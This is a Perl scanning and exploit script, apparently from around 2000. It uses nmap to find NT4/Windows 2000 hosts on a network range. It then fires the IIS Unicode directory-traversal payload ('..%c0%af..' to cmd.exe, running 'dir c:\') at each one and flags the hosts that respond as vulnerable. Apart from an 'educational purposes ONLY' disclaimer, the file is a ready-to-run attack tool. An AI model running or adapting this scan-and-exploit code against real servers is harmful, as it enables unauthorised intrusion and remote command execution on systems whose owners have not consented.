#!/usr/bin/perl 
# uni-test.pl
# this is a test program and should be used for educational purposes ONLY!
# NOTE: this was written on a RH Linux6.2 X86 based system.
# you will also need to DL and compile the LWP::Simple.pm module for perl

use LWP::Simple;
use Getopt::Std;
getopts("vt:?",\%args);

# here goes nothing...
if ( $args{t} ) {
    $target = $args{t};
} else {
    usage();
}
if ( $args{"?"} ) {
    usage();
}
print "Running nmap...\n";
if ( $args{v} ) {
    system("nmap -sS -p 80 -O $target -oM /tmp/targetnet");
} else {
    system("nmap -sS -p 80 -O $target -oM - > /tmp/targetnet");
}
open(TARGETNET, "/tmp/targetnet") || die "Cannot open file: /tmp/targetnet";
print "Please hold checking all servers in list\n";
print "----------------------------------------\n\n";
while (<TARGETNET>) {
    (/^\n/) && next;
    (/Starting nmap/) && next;
    (/^\#/) && next;
    if ( /^Host: ([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}).*?OS: (.*)/ ) {
	$ipaddress = $1;
	$osguess = $2;
	if ( $osguess =~ /NT4/ || $osguess =~ /Windows 2000/ ) {
	    print "Checking $ipaddress for uni-code exploit\n";
	    $content = get("http://$ipaddress/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\");
	    if ( $content =~ /Directory of c\:\\/ ) {
		print "$ipaddress is vulnerable\n";
	    }
	}
    } else {
	warn "Cannot parse: $_";
    }
}
close(TARGETNET);

sub usage {
    print <<USAGE;
Usage: perl uni-test.pl [-v?] -t <target host/net>
       -v           Verbose ( Show nmap output )
       -?           Show this screen
       -t <target>  <target> is the nmap host or range you would like to scan
                     sample: 192.168.0.2-254

Note: This program requires you to be root, and for you to have the program NMAP installed.

USAGE
exit;    
}